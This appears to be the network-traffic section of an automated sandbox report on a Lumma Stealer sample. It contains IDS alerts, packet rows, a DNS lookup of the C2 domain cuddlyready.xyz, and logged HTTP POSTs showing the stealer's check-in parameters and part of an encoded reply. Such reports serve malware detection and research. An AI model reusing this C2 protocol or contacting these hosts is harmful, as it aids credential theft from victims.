                                                                                                            2024-12-23T08:38:51.286446+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:51.286446+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:52.513407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:53.600013+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849706104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:53.600013+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:55.423450+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:56.325027+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849707104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:57.659276+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.32.96443TCP
                                                                                                            2024-12-23T08:38:59.961477+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.32.96443TCP
                                                                                                            2024-12-23T08:39:02.515687+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.32.96443TCP
                                                                                                            2024-12-23T08:39:05.146490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712104.21.32.96443TCP
                                                                                                            2024-12-23T08:39:08.780984+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.32.96443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 23, 2024 08:38:49.235155106 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:49.235271931 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:49.235385895 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:49.316843987 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:49.316876888 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:50.538502932 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:50.538800001 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:50.541793108 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:50.541815996 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:50.542241096 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:50.593230963 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:50.603789091 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:50.603857994 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:50.603940964 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.286461115 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.286573887 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.286679029 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.288285017 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.288355112 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.288398027 CET49705443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.288414001 CET44349705104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.297092915 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.297138929 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:51.297235966 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.297533035 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:51.297548056 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:52.513304949 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:52.513406992 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:52.514738083 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:52.514745951 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:52.514990091 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:52.516278028 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:52.516308069 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:52.516345024 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600028038 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600090027 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600119114 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600147963 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600166082 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.600174904 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600187063 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.600209951 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.600224972 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.602436066 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.610646963 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.610723972 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.610728025 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.610740900 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.610785961 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.619077921 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.671346903 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.719575882 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.765081882 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.792726040 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795406103 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795440912 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795460939 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.795473099 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795526028 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795578003 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.795784950 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.795795918 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:53.795826912 CET49706443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:53.795833111 CET44349706104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:54.210184097 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:54.210257053 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:54.210361004 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:54.210654020 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:54.210689068 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:55.423357964 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:55.423449993 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:55.424936056 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:55.424964905 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:55.425314903 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:55.426863909 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:55.427042007 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:55.427088022 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:56.325110912 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:56.325417995 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:56.325526953 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:56.325608969 CET49707443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:56.325649023 CET44349707104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:56.445085049 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:56.445142984 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:56.445588112 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:56.445588112 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:56.445633888 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:57.658924103 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:57.659276009 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:57.661535978 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:57.661566019 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:57.662036896 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:57.663305044 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:57.663405895 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:57.663427114 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:57.663501978 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:57.663508892 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:58.496375084 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:58.496529102 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:58.496587038 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:58.496658087 CET49708443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:58.496675968 CET44349708104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:58.749901056 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:58.749947071 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:58.750037909 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:58.750341892 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:58.750355959 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:59.961297035 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:59.961477041 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:59.963176012 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:59.963188887 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:59.963474989 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:59.965322018 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:59.965495110 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:59.965593100 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:38:59.965672016 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:38:59.965679884 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:00.879206896 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:00.879353046 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:00.879399061 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:00.879489899 CET49709443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:00.879513979 CET44349709104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:01.297694921 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:01.297749043 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:01.297857046 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:01.298177958 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:01.298196077 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:02.515568018 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:02.515686989 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:02.517290115 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:02.517322063 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:02.517589092 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:02.518738985 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:02.518805027 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:02.518815994 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:03.331624985 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:03.331765890 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:03.331872940 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:03.332128048 CET49710443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:03.332149982 CET44349710104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:03.919650078 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:03.919753075 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:03.919842958 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:03.920526981 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:03.920567989 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.146413088 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.146490097 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.147706985 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.147739887 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.148004055 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.149322987 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150073051 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150115967 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.150242090 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150279045 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.150403976 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150427103 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.150558949 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150602102 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.150824070 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.150866032 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.151021957 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.151057959 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.151070118 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.151086092 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.151212931 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.151242971 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.151274920 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.151386976 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.151437044 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.191353083 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.191606045 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.191663027 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.191710949 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.235346079 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:05.235419989 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:05.279335022 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:07.573292971 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:07.573369026 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:07.573471069 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:07.573647022 CET49712443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:07.573690891 CET44349712104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:07.584811926 CET49715443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:07.584836960 CET44349715104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:07.584903002 CET49715443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:07.585227966 CET49715443192.168.2.8104.21.32.96
                                                                                                            Dec 23, 2024 08:39:07.585239887 CET44349715104.21.32.96192.168.2.8
                                                                                                            Dec 23, 2024 08:39:08.780983925 CET49715443192.168.2.8104.21.32.96
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 23, 2024 08:38:49.043800116 CET6363053192.168.2.81.1.1.1
                                                                                                            Dec 23, 2024 08:38:49.185154915 CET53636301.1.1.1192.168.2.8
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 23, 2024 08:38:49.043800116 CET192.168.2.81.1.1.10x43edStandard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 23, 2024 08:38:49.185154915 CET1.1.1.1192.168.2.80x43edNo error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                            Dec 23, 2024 08:38:49.185154915 CET1.1.1.1192.168.2.80x43edNo error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                            • cuddlyready.xyz
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849705104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:50 UTC262OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:38:50 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-23 07:38:51 UTC1127INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:38:51 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=8rge7rmir1mlolekj9an5h314b; expires=Fri, 18 Apr 2025 01:25:30 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UdGV2Hb52%2FbsAsonJBgki1ElEFogG%2BczmDSnoStowkwNNuW64QU2ZMF0fT%2FPUOsTgV3S5LzWgETBvFkROKiPM56wnf8mx37%2Bcg%2BddRvTF8GKctjaQdLkFSQoTltfzEwtVkQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1c38ae932f4-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1904&rtt_var=729&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1486761&cwnd=112&unsent_bytes=0&cid=2974937d527f99ec&ts=762&x=0"
                                                                                                            2024-12-23 07:38:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-23 07:38:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849706104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:52 UTC263OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 47
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:38:52 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                            2024-12-23 07:38:53 UTC1128INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:38:53 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=8cmlad1boicnrakc1g19mkicfk; expires=Fri, 18 Apr 2025 01:25:32 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2B3yude%2FCjblb%2BCUiE45jdJdWYq0kZq%2BgW8bP9C9uud6tFa%2BK1BN0M0CTd7EP19jDKTm2isgDr03o2RD6PNEhuBIeWpUJQwnrZxvg5BLAPC58gzJ2sIA5ItZ55LEBrxgHX0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1cfe8840f74-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1459&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1931216&cwnd=151&unsent_bytes=0&cid=43b95cf8676bfe1d&ts=1096&x=0"
                                                                                                            2024-12-23 07:38:53 UTC241INData Raw: 34 39 31 63 0d 0a 56 62 43 57 6e 65 73 35 4f 4e 4f 37 56 70 4a 44 53 2b 45 69 51 36 31 67 6c 6c 37 47 55 38 4d 64 65 79 2b 47 7a 69 58 46 76 6e 6b 75 6b 75 43 2f 30 51 30 55 38 63 67 7a 73 48 6b 2f 6b 31 63 6d 67 55 4c 33 4f 75 52 70 70 58 77 58 58 4f 50 69 42 37 50 54 57 32 2f 57 39 2f 47 59 58 42 54 78 33 69 36 77 65 52 43 61 41 43 62 44 51 71 78 38 6f 7a 6d 68 66 42 64 4e 35 36 56 4b 74 64 49 61 50 64 7a 78 39 59 35 61 58 4c 4c 58 4f 2f 63 6d 4c 6f 42 49 4c 63 51 4e 2f 6a 50 6b 66 2b 46 34 41 51 32 38 37 47 69 67 79 68 67 59 30 65 58 32 79 55 51 55 71 4a 6b 7a 2f 47 46 78 77 30 4d 6d 7a 77 7a 77 4f 71 30 37 71 33 55 66 54 4f 4b 6b 56 61 7a 59 45 54 33 53 38 76 53 45 55 30 69 2f 33 54 7a 38 49 43 53 41 41 47 2b
                                                                                                            Data Ascii: 491cVbCWnes5ONO7VpJDS+EiQ61gll7GU8Mdey+GziXFvnkukuC/0Q0U8cgzsHk/k1cmgUL3OuRppXwXXOPiB7PTW2/W9/GYXBTx3i6weRCaACbDQqx8ozmhfBdN56VKtdIaPdzx9Y5aXLLXO/cmLoBILcQN/jPkf+F4AQ287GigyhgY0eX2yUQUqJkz/GFxw0MmzwzwOq07q3UfTOKkVazYET3S8vSEU0i/3Tz8ICSAAG+
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 50 42 65 78 38 2f 48 48 79 54 52 70 63 39 62 6c 4b 74 39 70 62 4b 4a 7a 74 76 34 35 58 47 75 6d 5a 50 50 77 76 4c 49 42 50 4a 73 34 43 35 6a 4f 6b 4d 71 6c 33 48 55 66 72 6f 30 69 70 31 68 77 2f 32 2f 50 77 6a 6c 4e 63 76 74 70 30 76 6d 45 75 6d 77 42 35 6a 79 4c 6b 50 36 63 6c 72 47 35 5a 55 71 71 31 42 36 44 51 57 32 2b 53 38 76 47 49 56 6c 71 6a 30 54 2f 37 4a 44 75 49 53 53 7a 43 41 76 6b 32 71 7a 4b 68 65 42 4e 48 36 36 5a 44 71 74 45 64 4e 39 4b 30 73 63 6c 63 51 76 47 42 64 4e 4d 6b 4f 59 52 4d 4e 34 30 34 74 43 50 71 4b 4f 46 34 46 51 32 38 37 45 2b 69 33 78 67 38 33 66 66 33 67 6b 6c 61 6f 39 38 35 39 54 4d 76 68 6b 34 72 7a 42 44 2b 4d 71 49 79 71 48 51 51 53 4f 4f 6f 42 2b 6d 63 48 43 2b 53 72 4c 2b 6f 56 6c 47 39 30 79 50 77 59 54 62 4e 57 57
                                                                                                            Data Ascii: PBex8/HHyTRpc9blKt9pbKJztv45XGumZPPwvLIBPJs4C5jOkMql3HUfro0ip1hw/2/PwjlNcvtp0vmEumwB5jyLkP6clrG5ZUqq1B6DQW2+S8vGIVlqj0T/7JDuISSzCAvk2qzKheBNH66ZDqtEdN9K0sclcQvGBdNMkOYRMN404tCPqKOF4FQ287E+i3xg83ff3gklao9859TMvhk4rzBD+MqIyqHQQSOOoB+mcHC+SrL+oVlG90yPwYTbNWW
